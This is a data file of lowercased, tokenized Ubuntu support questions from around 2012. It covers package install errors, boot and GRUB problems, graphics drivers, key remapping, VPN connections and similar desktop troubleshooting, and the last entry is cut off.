220723	i ca n't install or remove any application	when i try to install or remove an application via either software center or apt-get install they both fail and give some debconf errors below is the log please help.sorry some of the text is not english . sudo apt-get install aptitude paket listeleri okunuyor ... bitti bağımlılık ağacı inşa ediliyor . durum bilgisi okunuyor ... bitti aşağıdaki ek paketler de yüklenecek : aptitude-common libboost-iostreams1.49.0 libcwidget3 önerilen paketler : aptitude-doc-en aptitude-doc tasksel debtags libcwidget-dev aşağıdaki yeni paketler kurulacak : aptitude aptitude-common libboost-iostreams1.49.0 libcwidget3 yükseltilen : 0 , yeni kurulan : 4 , kaldırılacak : 0 ve yükseltilmeyecek : 48 . 8 tam olarak kurulmadı veya kaldırılmadı . indirilmesi gereken dosya boyutu 0 b/2.498 kb bu işlemden sonra 10,4 mb ek disk alanı kullanılacak . devam etmek istiyor musunuz [ e/h ] ? e use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : böyle bir dosya ya da dizin yok selecting previously unselected package aptitude-common . dpkg : uyarı : files list file for package 'aspell ' missing ; assuming package has no files currently installed dpkg : uyarı : files list file for package 'ubuntu-desktop ' missing ; assuming package has no files currently installed dpkg : uyarı : files list file for package 'vuze ' missing ; assuming package has no files currently installed dpkg : uyarı : files list file for package 'java-wrappers ' missing ; assuming package has no files currently installed ( veritabanı okunuyor ... 198988 files and directories currently installed . ) unpacking aptitude-common ( from ... /aptitude-common_0.6.8.1-2ubuntu1_all.deb ) ... selecting previously unselected package libboost-iostreams1.49.0 . unpacking libboost-iostreams1.49.0 ( from ... /libboost-iostreams1.49.0_1.49.0-3.1ubuntu1_amd64.deb ) ... selecting previously unselected package libcwidget3 . unpacking libcwidget3 ( from ... /libcwidget3_0.5.16-3.4ubuntu1_amd64.deb ) ... selecting previously unselected package aptitude . unpacking aptitude ( from ... /aptitude_0.6.8.1-2ubuntu1_amd64.deb ) ... wicd-daemon ( 1.7.2.4-2ubuntu1 ) kuruluyor ... use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : böyle bir dosya ya da dizin yok dpkg : error processing wicd-daemon ( -- configure ) : installed post-installation script alt işlemi çıkış durumunda hata döndürdü : 1 man-db ( 2.6.3-1 ) kuruluyor ... use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : böyle bir dosya ya da dizin yok dpkg : error processing man-db ( -- configure ) : installed post-installation script alt işlemi çıkış durumunda hata döndürdü : 1 dictionaries-common ( 1.12.10 ) kuruluyor ... use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : böyle bir dosya ya da dizin yok dpkg : error processing dictionaries-common ( -- configure ) : installed post-installation script alt işlemi çıkış durumunda hata döndürdü : 1 dpkg : dependency problems prevent configuration of aspell : aspell depends on dictionaries-common ( > > 0.40 ) ; bununla beraber : package dictionaries-common is not configured yet . dpkg : error processing aspell ( -- configure ) : bağımlılık sorunları - yapılandırılmadan bırakılıyor dpkg : dependency problems prevent configuration of aspell-en : aspell-en depends on aspell ( > = 0.60.3-2 ) ; bununla beraber : package aspell is not configured yet . aspell-en depends on dictionaries-common ( > = 0.49.2 ) ; bununla beraber : package dictionaries-common is not configured yet . dpkg : error processing aspell-en ( -- configure ) : bağımlılık sorunları - yapılandırılmadan bırakılıyor dpkg : dependency problems prevent configuration of hyphen-en-us : hyphen-en-us depends on dictionaries-common ( > = 0.10 ) | openoffice.org-updatedicts ; bununla beraber : package dictionaries-common is not configured yet . openoffice.org-updatedicts paketi yüklenmedi . package dictionaries-common which provides openoffice.org-updatedicts is not configured yet . dpkg : error processing hyphen-en-us ( -- configure ) : bağımlılık sorunları - yapılandırılmadan bırakılıyor dpkg : dependency problems prevent configuration of wicd-gtk : wicd-gtk depends on wicd-daemon ( = 1.7.2.4-2ubuntu1 ) ; bununla beraber : package wicd-daemon is not configured yet . dpkg : error processing wicd-gtk ( -- configure ) : bağımlılık sorunları - yapılandırılmadan bırakılıyor dpkg : dependency problems prevent configuration of wicd : wicd depends on wicd-daemon ( = 1.7.2.4-2ubuntu1 ) ; bununla beraber : package wicd-daemon is not configured yet . wicd depends on wicd-gtk ( = 1.7.2.4-2ubuntu1 ) | wicd-curses ( = 1.7.2.4-2ubuntu1 ) | wicd-cli ( = 1.7.2.4-2ubuntu1 ) | wicd-client ; bununla beraber : package wicd-gtk is not configured yet . wicd-curses paketi yüklenmedi . wicd-cli paketi yüklenmedi . wicd-client paketi yüklenmedi . package wicd-gtk which provides wicd-client is not configured yet . dpkg : error processing wicd ( -- configure ) : bağımlılık sorunları - yapılandırılmadan bırakılıyor aptitude-common ( 0.6.8.1-2ubuntu1 ) kuruluyor ... libboost-iostreams1.49.0 ( 1.49.0-3.1ubuntu1 ) kuruluyor ... libcwidget3 ( 0.5.16-3.4ubuntu1 ) kuruluyor ... aptitude ( 0.6.8.1-2ubuntu1 ) kuruluyor ... update-alternatives : using /usr/bin/aptitude-curses to provide /usr/bin/aptitude ( aptitude ) in otomatik mod processing triggers for libc-bin ... ldconfig deferred processing now taking place işlem sırasında hatalar bulundu : wicd-daemon man-db dictionaries-common aspell aspell-en hyphen-en-us wicd-gtk wicd e : sub-process /usr/bin/dpkg returned an error code ( 1 )
220724	when does `` not all updates can be installed '' warning appear	in what circumstances ( package problems , download problems , etc ) does the following image appear : what is the difference between clicking on the continue button or the partial upgrade button and what are the steps to solve this issue when it appears .
220730	after running updates in 10.10 netbook remix , ralink 5390 not working	additional drivers still lists the driver . reports it as being activated but not in use . prior to running updates , wireless was working fine . set it up using this guide : how to install drivers for ralink wireless network devices under ubuntu 11.10 thoughts and reflections would be much appreciated .
220732	i have to add weather extension in my gnome3 toolbar	i want to add a weather extension to my gnome3 toolbar but i cant get anything working . i am using ubuntu 12.10 with gnome3 . i tried to add this sudo add-apt-repository ppa : webupd8team/gnome3 sudo apt-get update sudo apt-get install gnome-shell-extensions-weather but the last command doest work it says that it cant locate such file . i installed this https : //launchpad.net/weather-indicator . but i cant seem to get it to show on the gnome toolbar . it only shows here . thanks for help !
220738	how to remap ctrl to escape if pressed and released on its own	i want to remap control , so that : if it is pressed and released with no other key , it acts as escape . if it is pressed & held together with another key , it acts as control ( no change in behavior in this case ) . i 'm aware of how do i remap certain keys ? , so i suspect it may be done with xmodmap . but that answer does not explain how to map the modifier keys . i looked into the examples and grammar sections of the xmodmap manpage , but they do not explain that . the answer in remapping caps lock to control and escape ( not the usual way ) mention that it is not possible to do that to capslock , since it is a lock key , but i hope this may be possible to do it with control which is a mod key . a solution with something different than xmodmap will also be accepted . ( i 'm running xmonad in ubuntu 12.04 , so perhaps there is a way to set this up in xmonad.hs ? ) edit : the closest i can get is : xmodmap -e 'remove control = control_l' xmodmap -e 'keysym control_l = escape' xmodmap -e 'add control = escape' with this i get escape when i press the left ctrl key alone , but to get , say , ctrl+a i have to press the left ctrl key twice : `` ctrl , ctrl+a '' ( rather than just `` ctrl+a '' ) - not sure why i need to press it twice .
220741	grub rescue does n't allow me to boot from live cd/usb	i used to have windows vista & ubuntu 12.04 on dual boot . accidentally , i deleted the linux partition and landed on grub rescue on the next boot . the tricky thing for me here is i have been trying to boot through live cd/usb of the ubunutu version , other linux versions but in vain . what happens is , it appears as if it reads the cd/dvd drive or the usb flashes for a while when trying to boot through live versions but the grub rescue appears after a while . the only option i could think here is to remove the hard disk and connect to the other laptop i have through usb and reinstall a fresh os . please suggest me a way to boot through the dvd/usb again . my laptop is sony vaio cr32 series.thanks .
220743	dash is empty , reinstallation does n't help	i used sudo apt-get install -- no-install-recommends ubuntu-desktop but dash home did n't show anything . i reinstalled , and the same result . what should i install to get it to work ? i only got a small icon home at the bottom center .
220748	apt-mirror - how to change mirror location without redownloading the whole mirror again	i 'm creating an ubuntu mirror at a location with a lot of bandwidth . i will have to move it to another country , where the closest mirror is a different one from the one i used before . if i change my mirror.list file to point to a different mirror , it starts downloading everything again , due to the fact it creates a subdir for every mirror location . if i rename this mirror location to the new mirror location , it still seems to try to download everything again . is this right , or am i imagining this ? if so , how can i convince apt-mirror to only search for updates and not re-download the whole mirror again ? karel
220749	music transfer to smartphone	how can i transfer music from my laptop ( ubuntu 10.04 ) to my smartphone nokia lumia 610 ?
220752	command line translator	is there a command line translator for ubuntu that has multiple languages ? with languages need english , japanese , chinese , vietnamese , korean , etc also nothing using google works anymore .
220756	anyconnect 3.1.01065 x64 and firefox 17	i just installed ubuntu 12.10 and i have firefox 17 . i installed anyconnect 3.1.01065 x64 and i am able to make it work but , i am unable to connect to my asa without disabling the 'block connections to untrusted servers ' and , even after removing the checkbox , i have the warning of untrusted vpn server certificate . if i click on the 'always connect ' button , i am getting an error : anyconnect can not confirm it is connected to your secure gateway . here is an interesting line i have found in my syslog : nov 21 20:54:23 dom-d830 acvpnui [ 2768 ] : function : openstores file : ../../vpn/commoncrypt/certificates/collectivecertstore.cpp line : 419 the firefox certificate store was not found please help ! ! ! dominique
220760	no icon with skype 4.1 in ubuntu 12.04	i just installed the new skype 4.1.0.20 . it appears to work fine , except that i 've lost the icon in the top bar and the only way to access it is to call it from the dash ( very annoying ) anyone know a quick fix for this or should i just report a bug ? edit : well , someone already filed a bug for this .
220763	why after upgrading to lubuntu 12.10 from 12.04 i ca n't login other than using the `` guest account '' ?	why after upgrading to lubuntu 12.10 from 12.04 i ca n't login other than using the `` guest account '' . on the login screen there is the option for `` guest account '' and `` other ... '' . i select `` other ... '' and type in the [ administrator ] user name and password i just used in the install [ the original user name & password from 12.04 ] and it keeps on giving me the message `` incorrect password , please try again '' . i have tried reinstalling with a different user name and password without any success . the only option i have n't tried yet is to set it to `` auto login '' during the install .
220768	after installing , ubuntu does not start unless liveusb is inserted and defaults to 7	i have a laptop with windows 7 . i installed ubuntu through usb . after restarting , , however , nothing happens . 7 automatically loads without showing the os selection screen . but when i insert the live usb , the screen that lets me select ubuntu shows up and i can access the ubuntu os installed on the hard drive . i 'm new to this , but is this an instance where i should use this ? and are there any specific instructions for it that i should be aware of ? thanks !
220771	how to compile deskew plugin for gimp ?	i 'm interesting in using this deskew plugin which appears somewhat old , with broken links in the gimp registry . https : //github.com/prokoudine/gimp-deskew-plugin how do i go about installing it on ubuntu 64-bit 12.10 running gimp 2.8 ? i ca n't figure what i have to `` configure '' or `` make '' to compile the plugin . i understand the end result should be placed noob-level : i know how to get around in a terminal , but that 's about it . thanks !
220774	how to override the system locale on a single command ?	when helping someone we often ask them to show the output of a command eg : sudo fdisk -l | pastebinit if the user is not using an english locale , the output may be in a foreign language : disk /dev/sda : 750.2 gb , 750156374016 bytes 255 huvuden , 63 sektorer/sp책r , 91201 cylindrar , totalt 1465149168 sektor this complicates support . how can one run a command with an override on the system locale to get english output ?
220776	how to get dell laptop display on tv ?	my dell laptop screen is damaged . i installed ubuntu 12.04.01 with tv monitor connected . after rebooting nothing is displayed on tv monitor , is any graphic driver missing from the installation ? edit - ( captured from tv monitor display boot mode ) device info from bios video controller - intel 915m graphics video bios version - 1219 video memory - 8 mb
220777	thinkpad ubuntu 12.10 savage driver not working	when i upgraded from 12.04 to 12.10 the display does not work . reading posts from other distros they claim the savage driver is now broken . i 've tried installing other debian based distros and they all fail to start x . once x starts it dies and get no screen . my thinkpad is a t22 and i rely on several of them . many older thinkpads use the savage video chipset and now many linux distros wo n't work on them . does anyone have any ideas ?
220779	clamav update failure . ubuntu 12.10	i am using the 4.42 gui version which is the newest . the antivirus engine is .97.6 also the newest . the problem is my antivirus definitions are out of date . when i run sudo freshclam here is the error : clamav update process started at thu nov 22 21:18:49 2012 connecting via localhost connect_error : getsockopt ( so_error ) : fd=4 error=111 : connection refused ca n't connect to port 8118 of host localhost ( ip : 127.0.0.1 ) warning : ca n't download main.cvd from db.local.clamav.net trying again in 5 secs ...
220780	how to disable usb autosuspend	i 'm trying out xubuntu 12.04 , preference was due to hardware specifications of my machine . my problem is my broadband connection using a usb huawei modem and sun telecoms philippines keeps getting disconnected . i 've read in ubuntu forums that this may be due to the usb autosuspend . how can usb autosuspend be disabled ? i 'm not using powernap or powertop , is there a way i can disable usb autosuspend from the terminal ?
220781	is there a bittorrent like http download manager ?	just wondering if there is a bit torrent like http/ftp download manager . when downloading a big file with bit torrent it creates the full dummy file initially and downloads multiple 2mb pieces simultaneously and fills the file . even when interrupted many times it never corrupts the data . and we can use the partially downloaded files from one pc and complete the download in second pc . so , can i download http files with such features .
220784	how do i configure gnome-screensaver ?	i am on ubuntu 12.10 and installed gnome-screensaver but i ca n't find any way to configure them or launch gnome-screensaver-preferences . f1 . i installed and got away with xscreensaver , now want to use gnome-screensaver . ran this in terminal : sudo apt-get install gnome-screensaver . now how to configure or change them ? like is there any gui support for the same ? i tried installing gnome screensaver and locker package from here : - https : //launchpad.net/ubuntu/quantal/+source/gnome-screensaver a .deb file , but to no avail . all help be much appreciated .
220787	which is a normal temperature for a laptop	i have a samsung series 5 my temperature is around 77-80°c when i am playing , and 48-54 on normal use it laptop don´t have a month and i am not sure if it is normal ( it is my first laptop ) intel® core™ i5-3210m cpu @ 2.50ghz × 4 8 gb ram nvidia optimus 650m ( i am using bumblebee ) ubuntu 12.04
220790	what extra packages are needed by amarok to transcode to mp3 ?	i 'm using amarok 2.6.0 , on kde version 4.9.3 , on kubuntu 12.04 . i would like to be able to copy my music onto my mp3 player ( in this case , my iphone 3 ) , but to transcode the tracks as i copy them over . however , when i right-click on the selected track , and choose `` copy to collection '' and select my iphone , the option to transcode to mp3 is greyed out . what additional packages does amarok need in order to enable the transcode to mp3 option ? oh , the `` amarok diagnostics '' output , from the help menu gives : amarok diagnostics amarok version : 2.6.0 kde version : 4.9.3 qt version : 4.8.2 phonon version : 4.6.0 phonon backend : gstreamer ( 4.6.2 ) pulseaudio : yes amarok scripts : amarok script console 1.0 ( stopped ) discogs 1.1b ( stopped ) lyricwiki .2 ( stopped ) free music charts 1.6.0 ( stopped ) librivox.org 1.0 ( stopped ) cool streams 1.0 ( stopped ) bbc 1.1 ( stopped ) amarok plugins : audiocd collection ( enabled ) daap collection ( enabled ) mtp collection ( enabled ) mysqlserver collection ( enabled ) mysqle collection ( enabled ) upnp collection ( enabled ) universal mass storage collection ( enabled ) ipod , ipad & iphone collection ( enabled ) ampache ( disabled ) jamendo ( disabled ) last.fm ( enabled ) mp3 music store ( disabled ) mp3tunes ( disabled ) magnatune store ( disabled ) podcast directory ( enabled ) gpodder.net ( enabled ) local files & usb mass storage backend ( enabled ) nfs share backend ( enabled ) smb ( windows ) share backend ( enabled )
220793	creating a toolbar with buttons like software center	how do i create a toolbar with buttons that look like the ones in software center ? i 've figured out out to set the style of the toolbar to gtk.style_class_primary_toolbar , but i want to set the buttons to look like page selectors instead of regular buttons . i 'm trying to create a bunch of buttons to switch between pages according to this specification : contributor console thanks .
220797	can i get some advice on graphics cards please ?	i know that steam for linux is on the way and have been seen a lot of games appearing in the ubuntu software centre of late but my system lacks a decent graphics card and was hoping i could get some recommendations . the desktop is a packard bell imedia s1800 ( or imedia d3526 uk ) with the following specs ; memory : 3.8 gib processor : pentium ( r ) dual-core cpu e5800 @ 3.20ghz ă 2 the system lists the graphics as an intel g41 from what i can see there is a free pci-e x16 slot . any advice would be great , thanks !
220801	when i try to start minecraft on ubuntu 12.04 it says it requires a java runtime enviroment 1.5.0	please help ! i want to play this game , i 've been looking for a way to get this to work , but nothing seems to work .
220802	no sound zynaddsubfx and jack wont run	i am trying to run zynaddsubfx . when i start from the command line , i get this : http : //paste.ubuntu.com/1378693/ when i start jack i get this : http : //paste.ubuntu.com/1378694/
220803	ubuntu boot problem/unity failure	so here i am sitting in a big pile of muck ... over the last 2 days things have just been going from bad to worse with version of ubuntu 12.10 . so 2 days ago i was fiddling around with kismet and airmon-ng . i had added a bunch of libraries , i remember adding gtk+ , glib , pango , etc . after restarting the other day my desktop opened fine but my background was changed to the default and none of my files on the desktop were visible and the top bar and side bar were not visible or functioning . the window managers were still working . i then tried reinstalling my nvidia drivers to see if that would change anything , it did not . then after doing some searching online i found something that suggested i try deleting the file `` libgtk-3.so.0 '' . i deleted this and tried to restart the computer . upon restart , i was greeted by a black screen with some writing saying something about -starting clamav [ ok ] -problem with apache server could not verify correct ... something ... - checking battery state [ ok ] . after it gets to battery state it just stops and sits there indefinitely . so to sum , i can not login to ubuntu because it just sits at this black screeen . if anyone has any idea as to what is going on and how to fix it please let me know . thanks !
220805	firefox : middle mouse button stopped working	in firefox , middle mouse button/wheel has been assigned `` open link in new tab '' action for a while now , by default . since i ran software update tonight , this action does n't work in firefox anymore . to be specific , middle mouse click does n't open links anymore . at the same time , it closes tabs just fine ( middle-click a tab == 'close tab ' ) . i do n't know the update details , but i remember that firefox update was there among other things . i tried running firefox with a clean profile and middle button did work there , so something must 've changed with existing settings .
220807	139 updates wont update	i ca n't seem to upgrade the 139 packages i can upgrade . it is saying i am not connected to the internet yet i am typing this to you on the same computer . i have deleted most of the errors as it shows the same ip all the time and i am not sure if it is mine or not . here is the error message i get : failed to fetch http : //au.archive.ubuntu.com/ubuntu/pool/main/i/icedtea-web/icedtea-netx-common_1.2-2ubuntu1.2_all.deb 404 not found any ideas would be greatly appreciated .
220809	blackberry desktop manager for ubuntu	how do i backup and sync my blackberry mobile in ubuntu 12.04 are there any application available for the same ? ? also , i am unable to set up my email on the blackberry mobile , what could be the problem ? the set-up for e-mail is not appearing in set-up applications .
220815	netflix desktop application will not start , ubuntu 12.10	i got the netflix desktop app and did what is said to do from this link http : //www.iheartubuntu.com/2012/11/ppa-for-netflix-desktop-app.html when i click on dash home and click the netflix desktop icon nothing happens . by the way , i am running the 32 bit version of ubuntu 12.10
220816	windows 7 not booting after installing ubuntu 12.10	i have samsung sf511 with windows 7 home preinstalled . i installed ubuntu 12.10 last night . first i downloaded ubuntu 12.10 dvd iso and burned a dvd . i rebooted and changed the boot option to dvd and let the ubuntu dvd run . i selected `` install ubuntu alongside windows 7 '' . in the next step i allocated the diskspace . ubuntu installed perfectly and it ran ok . i spent a good time exploring ubuntu . when i restarted to start my work on windows again and selected windows 7 to boot , it showed blue screen after booting up ( after logging in ) . i tried restarting several times but the same blue screen keep showing at the same point of bootup . i also restored windows to an earlier time . left with no option i booted from samsung provided windows recovery option . the recovery process ran fine but when it restarted to boot windows for the first time all i see is a black screen . nothing happens . it switches between dark command promt screen to a pitch black screen as if it 's rebooting after every 10 seconds or so . the laptop can be booted from the dvd drive or usb drive but is not booting from harddisk . what should i do in order to use both windows 7 and ubuntu ?
220821	what to do with driver which is `` activated but not currently in use '' ?	ubuntu 12.04 , graphics card : geforce-4 mx 420 , from nvidia website , downloaded nvidia-linux-x86-96.43.18.pkg1.run moved it from downloads folder to `` nvidia folder '' . i searched for `` additional drivers '' . i got a response that nvidia- ( current ) was `` activated but not currently in use '' . what should i do ? a . did i download it incorrectly ? b . did i move , open or install it incorrectly ? c. i want to update driver to improve rendering . d. i 'm not sure what to do next .
220822	login takes long time in ubuntu 12.10	in my ubuntu 12.10 it takes lone time to login , i just upgraded this from 12.04 . i suspect that it might be due to large number of folders in my /home . so please suggest me : the way which help me to reduce login time also tell is it fine to put large no . of folders in /home dir ? and if not , how can i manage ( and knows which folder is unnecessary ) the folders in /home dir ?
220824	how to connect a nexus 10 to transfer files ?	this is a similar question to how to connect nexus 7 with ubuntu , but the solution given there doesnt work . how can i connect nexus 10 on ubuntu . it gives me an error ( actually tries to access the device for 30secs and gives up ) when i try to open the `` nexuis 10 '' icon in the document viewer ( like how a usb is displayed )
220826	scheduled backup and clone of ubuntu usb live	i created a usb live with ubuntu and works just great . however , i would want to know how to master this portable solution . my first concern is data lose ( maybe the stick gets lost , maybe damaged ) so would love to be able to sync all my data from the usb ubuntu live on ubuntu one . therefore , every-time i run from the stick and have an internet connection , to sync all my changes for the system to the cloud , so if i get it lost , to be able to install a fresh ubuntu then just select a restore point from ubuntu one . second thing : would be great to easily clone all data from usb stick to another one ( i want to buy a high speed usb stick ) . if first option can be done , then you can easily buy a faster usb stick , install ubuntu fresh , then just restore your settings from the cloud . is it possible to have this control over your ubuntu usb live ? i think would be a great solution . thank you .
220828	not able to reinstall 9.10 ubuntu	after installing ubuntu 9.10 i shut my computer down . when i restart i get nothing and am unable to reinstall . why ?
220833	by what methods can i check information about a dvd video disc ?	i have some dvd video discs that i am intending to sell . i would like to get information such as region , language , subtitles . some of the discs are in another language which i can not read , and some are from small publishers and do not have such information on the disc or the boxes . what methods can i use to access this information ? please list command line options , as well as common gui based tools ( eg vlc player ) .
220835	upgrade 9.10 to 10.04	we have karmic koala on our workstation . when we tried upgrading using update manager , the window froze ( turned black and white ) and we had to `` force quit '' . we used the command-line `` sudo do-release-upgrade -d '' , it shows `` checking new ubuntu release '' without any further output . both methods did not work for about 2-3 hrs . should we have tried longer ? if not , how do we proceed now ? thank you .
220836	create a distro with relinux	i want to create a distro from ubuntu 12.04 ( with relinux ) my problems : i want to remove and change these parts how to change ubuntu name and logo in details ( system setting -- > details ) how do you do this ?
220837	installing apache2 , php5 , mysql , phpmyadmin	i used the following commands sudo atp-get install apache2 sudo apt-get install mysql-server sudo apt-get install php5 sudo apt-get install phpmyadmin sudo /etc/init.d/apache2 restart after everything was done , i typed http : //localhost in chromium ... nothing happened . can anyone help ?
220846	`` error : could not find java.nio.file.paths '' when using oracle jdk 1.7	i want to try out some features rolled out in oracle 's new jdk 1.7 . i followed the post : - oracle jdk 1.7 but the post does n't seem to help . i was trying to fetch out the structure for java.nio.file.paths class file but got the following error : - buffer @ ankit : ~ $ javap java.nio.file.paths error : could not find java.nio.file.paths however i can easily get the information about class structures till java se 1.6 , here is an example : - buffer @ ankit : ~ $ javap java.lang.object compiled from `` object.java '' public class java.lang.object { public java.lang.object ( ) ; public final native java.lang.class getclass ( ) ; public native int hashcode ( ) ; public boolean equals ( java.lang.object ) ; protected native java.lang.object clone ( ) throws java.lang.clonenotsupportedexception ; public java.lang.string tostring ( ) ; public final native void notify ( ) ; public final native void notifyall ( ) ; public final native void wait ( long ) throws java.lang.interruptedexception ; public final void wait ( long , int ) throws java.lang.interruptedexception ; public final void wait ( ) throws java.lang.interruptedexception ; protected void finalize ( ) throws java.lang.throwable ; static { } ; } running java -version gives the following result : - buffer @ ankit : ~ $ java -version java version `` 1.7.0_09 '' java ( tm ) se runtime environment ( build 1.7.0_09-b05 ) java hotspot ( tm ) 64-bit server vm ( build 23.5-b02 , mixed mode ) system information buffer @ ankit : ~ $ sudo update-alternatives -- config java [ sudo ] password for buffer : there are 4 choices for the alternative java ( providing /usr/bin/java ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java 1061 auto mode 1 /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java 1061 manual mode 2 /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java 1051 manual mode 3 /usr/lib/jvm/jdk1.7.0_09/ 1 manual mode * 4 /usr/lib/jvm/jdk1.7.0_09/bin/java 1 manual mode buffer @ ankit : ~ $ sudo update-alternatives -- config javac there are 2 choices for the alternative javac ( providing /usr/bin/javac ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/lib/jvm/java-6-openjdk-amd64/bin/javac 1061 auto mode 1 /usr/lib/jvm/java-6-openjdk-amd64/bin/javac 1061 manual mode * 2 /usr/lib/jvm/jdk1.7.0_09/bin/javac 1 manual mode buffer @ ankit : ~ $ sudo update-alternatives -- config javaws there are 3 choices for the alternative javaws ( providing /usr/bin/javaws ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/javaws 1061 auto mode 1 /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/javaws 1061 manual mode 2 /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/javaws 1060 manual mode * 3 /usr/lib/jvm/jdk1.7.0_09/bin/javaws 1 manual mode the directory structure of /usr/lib/jvm/ is as follows : - buffer @ ankit : ~ $ ls -l /usr/lib/jvm/ total 24 lrwxrwxrwx 1 root root 24 dec 2 2011 default-java - > java-1.6.0-openjdk-amd64 drwxr-xr-x 4 root root 4096 nov 8 16:24 java-1.5.0-gcj-4.6 lrwxrwxrwx 1 root root 24 dec 2 2011 java-1.6.0-openjdk - > java-1.6.0-openjdk-amd64 lrwxrwxrwx 1 root root 20 oct 25 00:01 java-1.6.0-openjdk-amd64 - > java-6-openjdk-amd64 lrwxrwxrwx 1 root root 20 oct 25 06:59 java-1.7.0-openjdk-amd64 - > java-7-openjdk-amd64 lrwxrwxrwx 1 root root 24 dec 2 2011 java-6-openjdk - > java-1.6.0-openjdk-amd64 drwxr-xr-x 7 root root 4096 nov 8 16:24 java-6-openjdk-amd64 drwxr-xr-x 3 root root 4096 nov 8 16:24 java-6-openjdk-common drwxr-xr-x 5 root root 4096 nov 8 05:48 java-7-openjdk-amd64 drwxr-xr-x 3 root root 4096 nov 8 05:48 java-7-openjdk-common drwxr-xr-x 8 buffer buffer 4096 sep 25 09:08 jdk1.7.0_09 any help would be highly appreciated .
220847	kubuntu and keyring	kubuntu 12.04 . i ca n't open ubuntuone . `` enter password for keyring 'default ' to unlock '' dialog pops up . my login password wo n't work . i ca n't remember whether i left it empty first time .
220849	12.10 - gpu lockup	i just downloaded the ubuntu 12.10 and i am trying to install on my laptop with nvidia chipset , on previous version i was able to install on through nomodeset command and the i use to install later on .. the last i used was on ubuntu 11. and now i am stuck with ubuntu 12.10 hanging on primary boot.. with gpu lockup error and i know its the graphic card bug . but every through grub when i go in failsafe x option , system just sits there and its stuck.. please help for this one .
220850	12.04 'precise pangolin ' disfunctional after upgrade from 10.04 'lucid lynx '	hello all and thank you for your time reviewing my problem . i have used 10.04 ( which i believe to be a lts ? ) lucid lynx with the unity desktop on my lenovo s10-3 netbook for a couple of years now and was quite happy with it . since upgrading it to 12.04 the unity desktop became completely unusable . everything became laggy , extremely slow and applications do n't even show up in the heads up display . trying to shut down ubuntu only freezes in the logout screen and i have to kill it with the power button ( terminal sudo halt does not shut it down either ) the funny thing is that in the guest account everything works quite nicely . tried a recommendation read here in a question to unity -- reset which did not solve anything . i hate the idea of wiping everything and fresh install since i 'm already close to my download quota with my isp . so what the best way to start of tackling the problem ? where do i get error logs from my netbook that would assist troubleshooting ? how do you do that in terminal mode if one has to ? thanks for your time .
220851	how can i remove ubuntu 12.04 completly from my system ?	i installed ubuntu 12.04 after formatting my computer by removing win xp ; now i want to install windows xp again but i am getting some errors . i ca n't create partition ; if i created one it says his space is 1003 mb
220856	media player folder path to ubuntu server issue	i just installed my first ubuntu server as my main media hub . i have samba installed . my problem is that i am not able to browse my folders in the server from my media player ( popcorn-a110 find the server but when i click ok to browse the folder , i get `` no such a file or folder '' msg ) . do i need to show the correct path in samba config file ? and where should i put my `` media '' folder in the hdd . under /home or somewhere else ? thanks .
220861	how do i create a vpn over another vpn ?	i am in a network that for accessing internet we must connect to vpn . also there exist another service for special bandwith for some users . so for accessing this service i must create another vpn . but when i try to connect this vpn , the connection of vpn server disconnected . is there a way to create a vpn over another vpn -two vpn over
